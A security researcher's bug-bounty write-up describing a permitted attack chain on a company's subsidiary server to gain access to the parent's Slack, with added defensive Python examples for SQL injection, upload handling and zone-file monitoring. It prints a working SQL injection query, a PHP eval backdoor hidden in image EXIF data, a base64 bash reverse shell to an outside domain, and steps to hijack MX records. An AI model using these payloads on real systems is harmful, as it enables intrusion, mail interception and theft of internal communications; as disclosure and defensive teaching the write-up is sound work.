Pwning child company to get access to ParentCompany's Slack Team

Disclaimer: Prior permission was taken before performing the heavy attacks on the targets below; you should not try this without obtaining prior permission.

The following was reported to a program on HackerOne. I have redacted the company name; let's call it ParentCompany. So, ParentCompany has a program on HackerOne, and it has a child company, let's say childcompany.com. The child company was not in scope of the program nor mentioned anywhere on the policy page, but hacking inside it led to something which could have a critical security impact on the company. Here is the exact report I submitted on HackerOne, with some redaction:


Hello ParentCompany,

Going to the Slack URL of ParentCompany, https://parentcompany.slack.com/, shows that if you have an @parentcompany.com or @childcompany.com email address, you can create an account.

[image: slack_signup]

The thing which interests me is the website childcompany.com: if I am able to read emails sent to anything@childcompany.com, I can get inside ParentCompany's Slack Team.

Performing a whois search shows the organization to be ChildCompany, with the nameservers ns1.childcompany.com and ns2.childcompany.com.

XX.XX.XX.XX is the server IP of childcompany.com.

Visiting http://XX.XX.XX.XX/ redirects to http://XX.XX.XX.XX/cgi-sys/defaultwebpage.cgi, which displays:

[image: cpanel_nd_whm]

Great Success ! 
Apache is working on your cPanel® and WHM™ Server

So we have cPanel running on the server (http://XX.XX.XX.XX:2082/), which means that if we can somehow get access to the server, we can edit the zone file, add our MX records and receive mails sent to anything@childcompany.com.

Even assuming we somehow got access to the server, we would still need to be root to edit the zone file of childcompany.com and add our MX records.

Running an nmap scan against childcompany.com shows that it's running Exim smtpd 4.80 on port 26:

26/tcp   open   smtp     Exim smtpd 4.80

Exim <= 4.84-3 has a very simple local root exploit (ref: https://www.exploit-db.com/exploits/39535/ ).

OK, so we know that cPanel is running on the server, and we have a local root exploit with which we could modify the zone file of childcompany.com to add our MX records. Now the most important step: we need RCE on the server.

SQLi:

Visiting the website, I found that almost all of the files are vulnerable to SQLi:

http://www.childcompany.com/somedirectory/randomfile.php?ID=66'

A warning can be seen on the page:

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/childcompany/public_html/somedirectory/randomfile.php on line 181

We also have an admin panel at http://www.childcompany.com/admin/

The following query fetches the credentials of the admin panel:

http://www.childcompany.com/somedirectory/randomfile.php?ID=-66+union+/*!select*/+group_concat(user,0x3a,pass)+from+Login--+

which gives us:

"admin:redactedpass,admin1:redactedpass1"
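To show why the query above works and what the fix looks like, here is an added example of my own (not code from the report or from childcompany.com's site). It uses Python's sqlite3 instead of the site's PHP/MySQL, with a constructed articles table and a Login table of made-up credentials; the union-based extraction and the parameterized fix are the same idea you would apply with PDO prepared statements in PHP. The table and column names are assumptions modelled on the report.

```python
import sqlite3

# Constructed stand-in for the site's database: an articles table looked up by
# ID and a Login table like the one the report extracted credentials from.
# All values are made up for this example.
def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE articles (ID INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO articles VALUES (66, 'Press release');
        CREATE TABLE Login (user TEXT, pass TEXT);
        INSERT INTO Login VALUES ('admin', 'redactedpass'), ('admin1', 'redactedpass1');
    """)
    return con


def vulnerable_lookup(con: sqlite3.Connection, raw_id: str) -> list:
    """Roughly what randomfile.php did: the ID query parameter is pasted
    straight into the SQL text, so an appended UNION SELECT runs as well."""
    sql = f"SELECT ID, title FROM articles WHERE ID={raw_id}"
    return con.execute(sql).fetchall()


def vulnerable_error_text(con: sqlite3.Connection, raw_id: str):
    """Returns the database error an unbalanced input like 66' produces, or
    None. Echoing this class of message to the page is what leaked the
    /home/childcompany/... path in the report."""
    try:
        vulnerable_lookup(con, raw_id)
        return None
    except sqlite3.Error as exc:
        return str(exc)


def safe_lookup(con: sqlite3.Connection, raw_id: str):
    """Hardened form: validate the type, then bind the value as a parameter so
    user input never becomes part of the SQL text. Returns None for input the
    handler should reject with a 400 (and log) rather than echo a warning for."""
    try:
        article_id = int(raw_id)
    except ValueError:
        return None
    return con.execute(
        "SELECT ID, title FROM articles WHERE ID=?", (article_id,)
    ).fetchall()


if __name__ == "__main__":
    con = build_db()
    union = "-66 UNION SELECT 1, group_concat(user || ':' || pass) FROM Login"
    print("vulnerable:", vulnerable_lookup(con, union))   # leaks the Login table
    print("error leak:", vulnerable_error_text(con, "66'"))
    print("hardened:  ", safe_lookup(con, union))          # None: rejected
```

The type check before binding matters as much as the placeholder: a numeric ID that arrives as anything other than digits is a malformed request and should be logged as one, which also gives a detection signal for the probing seen in the report.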

We can log in to the admin panel using the credentials admin:redactedpass. Inside the admin panel we can upload images by going to

http://www.childcompany.com/admin/redactedfile.php

The uploader checks whether the uploaded file is a valid image but doesn't check the file extension, so we can upload an image with a PHP backdoor in its EXIF data. I uploaded an image with <?php echo eval(base64_decode($_GET['cmd'])); ?><!-- in the image's comment field, added using the tool Exif Pilot.

Here is the link to the file executing the command id:

http://www.childcompany.com/somedirectory/uploads/404.php?cmd=ZWNobyBzaGVsbF9leGVjKCdpZCcpOw==

[image: id]
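The uploader's mistake was trusting the image check alone. As an added example (mine, not the site's code), here is a Python upload handler that enforces an extension allow-list, verifies the magic bytes match that extension, strips the COM and APPn segments where EXIF comments live, and stores the file under a server-generated name. The JPEG marker walk is my own parser, and the sample JPEG is constructed inline; it is structurally valid for the parser but not a real picture.

```python
import secrets
import struct

# Extensions the uploader will store. The client's filename only selects one
# of these; the name written to disk is generated server-side.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Standard JPEG marker values.
SOS, COM = 0xDA, 0xFE
STANDALONE = {0x01, 0xD8, 0xD9} | set(range(0xD0, 0xD8))  # TEM, SOI, EOI, RSTn


def strip_jpeg_metadata(data: bytes) -> bytes:
    """Copy a JPEG while dropping every COM and APP1..APP15 segment (EXIF, XMP,
    comments), which is where the report's PHP payload lived. Walks the marker
    segments up to the first SOS and copies the scan data verbatim. Assumes no
    0xFF fill bytes between markers."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    out = bytearray(data[:2])
    i = 2
    while i + 1 < len(data):
        if data[i] != 0xFF:
            raise ValueError("corrupt marker stream at offset %d" % i)
        marker = data[i + 1]
        if marker == SOS:
            out += data[i:]          # entropy-coded data through EOI
            return bytes(out)
        if marker in STANDALONE:
            out += data[i:i + 2]
            i += 2
            continue
        (seg_len,) = struct.unpack(">H", data[i + 2:i + 4])
        drop = marker == COM or 0xE1 <= marker <= 0xEF
        if not drop:
            out += data[i:i + 2 + seg_len]   # keep APP0/JFIF, DQT, SOF, DHT, ...
        i += 2 + seg_len
    raise ValueError("truncated JPEG: no SOS segment")


def accept_upload(client_name: str, data: bytes) -> tuple:
    """Returns (True, stored_name, cleaned_bytes) or (False, reason, b'').
    Checks the extension allow-list, verifies the magic bytes match that
    extension, strips metadata, and generates a random filename."""
    ext = client_name.rsplit(".", 1)[-1].lower() if "." in client_name else ""
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed", b""
    if ext in ("jpg", "jpeg"):
        if data[:2] != b"\xff\xd8":
            return False, "content is not JPEG", b""
        data = strip_jpeg_metadata(data)
    elif ext == "png" and data[:8] != b"\x89PNG\r\n\x1a\n":
        return False, "content is not PNG", b""
    elif ext == "gif" and data[:6] not in (b"GIF87a", b"GIF89a"):
        return False, "content is not GIF", b""
    stored_name = f"{secrets.token_hex(16)}.{ext}"
    return True, stored_name, data


def build_sample_jpeg(comment: bytes) -> bytes:
    """Constructed minimal JPEG: SOI, APP0, a COM and an APP1 segment that both
    carry `comment`, then a tiny SOS and EOI."""
    def seg(marker: int, body: bytes) -> bytes:
        return b"\xff" + bytes([marker]) + struct.pack(">H", len(body) + 2) + body
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    return (b"\xff\xd8" + seg(0xE0, app0) + seg(COM, comment)
            + seg(0xE1, b"Exif\x00\x00" + comment)
            + seg(SOS, b"\x01\x01\x00\x00\x3f\x00") + b"\x12\x34\x56" + b"\xff\xd9")


if __name__ == "__main__":
    raw = build_sample_jpeg(b"<?php echo 1; ?>")
    print(accept_upload("404.php", raw)[:2])        # rejected on extension
    ok, name, clean = accept_upload("photo.jpg", raw)
    print(ok, name, b"<?php" in clean)              # True <random>.jpg False
```

Even with the random name, serve the uploads directory with script execution disabled: the stored name, not the client's, decides what the web server does with the file, so a name like photo.php.jpg never reaches disk under that name here.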

So now let's gain a back-connect shell. After trying many methods, the following worked. We need to use a domain name instead of an IP to get the back-connect shell, and the firewall rules only allowed outbound connections to ports 80 and 443. The server was also somehow blocking a direct back-connect executed as a command through the web shell, but saving the payload to a file inside /tmp/ and executing that file worked. We can save the payload with the following command:

$dt=base64_decode("YmFzaCAtaSA+JiAvZGV2L3RjcC9teWRvbWFpbi5jb20vODAgMD4m");$fp=fopen("/tmp/1","a+");fputs($fp,$dt);fclose($fp); echo "ok";

Where YmFzaCAtaSA+JiAvZGV2L3RjcC9teWRvbWFpbi5jb20vODAgMD4m is the base64 of the back-connect payload bash -i >& /dev/tcp/mydomain.com/80 0>&1, which is then run with the command bash /tmp/1.
Visiting the following URL saves our payload inside /tmp/1:

http://www.childcompany.com/somedirectory/uploads/404.php?cmd=JGR0PWJhc2U2NF9kZWNvZGUoIlltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDOXRlV1J2YldGcGJpNWpiMjB2T0RBZ01ENG0iKTskZnA9Zm9wZW4oIi90bXAvMSIsImErIik7ZnB1dHMoJGZwLCRkdCk7ZmNsb3NlKCRmcCk7IGVjaG8gIm9rIjs=

And then run it by visiting:

http://www.childcompany.com/somedirectory/uploads/404.php?cmd=ZWNobyBzaGVsbF9leGVjKCdiYXNoIC90bXAvMScpOw==

So we get a back-connect shell and can easily gain root with just 2-3 commands:

[image: shell]

Here is the zone file where all the DNS records for the domain are stored:

[image: shell2]

Impact

Now that we are root, we can simply add the MX records of any free business email provider, such as ZohoMail, by editing the zone file /var/named/childcompany.com.db and then running the command rndc reload childcompany.com to update the DNS records. From then on we can receive mails on behalf of childcompany.com, simply request a signup link to get inside ParentCompany's Slack Team, and view internal communications between employees; from there an attacker could pivot further to gain access to https://parentcompany.com

Regards,
Parth :)


Takeaway

You should always check whether you can somehow read emails sent to anything@domain.com for the domain(s) listed at https://companyname.slack.com/, if it allows signup through email, whether via Ticket Trick, credentials found on GitHub, or hacking inside an out-of-scope asset (with prior permission, of course), as access to a company's Slack can result in gaining full access to the company's servers, sensitive information, etc.
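From the defender's side, the edit described in the Impact section (a new MX record added to /var/named/childcompany.com.db and activated with rndc reload) is exactly the change a zone-file or DNS monitor should catch, and the takeaway above means the domains listed on the Slack signup page are the ones to watch. The following added example (mine, not from the report) parses a constructed BIND-style zone file in Python, reads the SOA serial for change detection, and flags apex MX records that are not on an approved list. The zone contents, the approved exchange and the rogue hostname are all made up.

```python
# Constructed sample zone in BIND format, modelled on the /var/named/<domain>.db
# layout the report shows. Names, serial and the rogue MX are made up.
SAMPLE_ZONE = """\
$TTL 14400
@       IN SOA  ns1.childcompany.com. hostmaster.childcompany.com. (
                2016031502      ; serial
                86400 7200 3600000 86400 )
        IN NS   ns1.childcompany.com.
        IN NS   ns2.childcompany.com.
@       IN MX   0  mail.childcompany.com.
@       IN MX   10 mail.attacker-controlled.example.   ; record nobody approved
mail    IN A    192.0.2.10
www     IN A    192.0.2.10
"""

# The MX exchanges the domain owner actually approved (constructed).
EXPECTED_MX = {"mail.childcompany.com."}


def parse_zone(text: str, origin: str) -> list:
    """Minimal BIND zone parser returning (owner, ttl, type, rdata_tokens).
    Handles ';' comments, '( ... )' continuation lines, '@' and inherited
    owners, and optional TTL/class fields. $-directives are skipped because
    the origin is passed in explicitly."""
    records, owner, buf, depth, indented = [], origin, [], 0, False
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].rstrip()
        if not buf:
            if not line.strip():
                continue
            indented = line[0].isspace()   # blank owner: reuse the previous one
        buf.append(line.strip())
        depth += line.count("(") - line.count(")")
        if depth > 0:
            continue                       # still inside a multi-line record
        tokens = " ".join(buf).replace("(", " ").replace(")", " ").split()
        buf, depth = [], 0
        if tokens[0].startswith("$"):
            continue
        if not indented:
            name = tokens.pop(0)
            if name == "@":
                owner = origin
            else:
                owner = name if name.endswith(".") else f"{name}.{origin}"
        ttl = int(tokens.pop(0)) if tokens and tokens[0].isdigit() else None
        if tokens and tokens[0].upper() in ("IN", "CH", "HS"):
            tokens.pop(0)
        rtype = tokens.pop(0).upper()
        records.append((owner, ttl, rtype, tokens))
    return records


def zone_serial(records: list) -> int:
    """SOA rdata order is: mname rname serial refresh retry expire minimum.
    A serial that changes outside a change window is itself worth an alert."""
    for _, _, rtype, rdata in records:
        if rtype == "SOA":
            return int(rdata[2])
    raise ValueError("no SOA record")


def find_rogue_mx(records: list, origin: str, expected: set) -> list:
    """Apex MX records whose exchange host is not on the approved list,
    returned as (preference, exchange) pairs."""
    rogue = []
    for owner, _, rtype, rdata in records:
        if rtype != "MX" or owner != origin:
            continue
        pref, exchange = int(rdata[0]), rdata[1]
        if not exchange.endswith("."):
            exchange = f"{exchange}.{origin}"
        if exchange.lower() not in expected:
            rogue.append((pref, exchange))
    return rogue


if __name__ == "__main__":
    recs = parse_zone(SAMPLE_ZONE, "childcompany.com.")
    print("serial:", zone_serial(recs))
    for pref, host in find_rogue_mx(recs, "childcompany.com.", EXPECTED_MX):
        print(f"ALERT: unexpected MX {pref} {host}")
```

Running the same comparison on a schedule against both the on-disk zone and live resolver answers gives two independent signals, and the list of approved exchanges should cover every domain that the Slack signup page accepts, not only the parent company's primary domain.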

Thanks Sandeep for proofreading.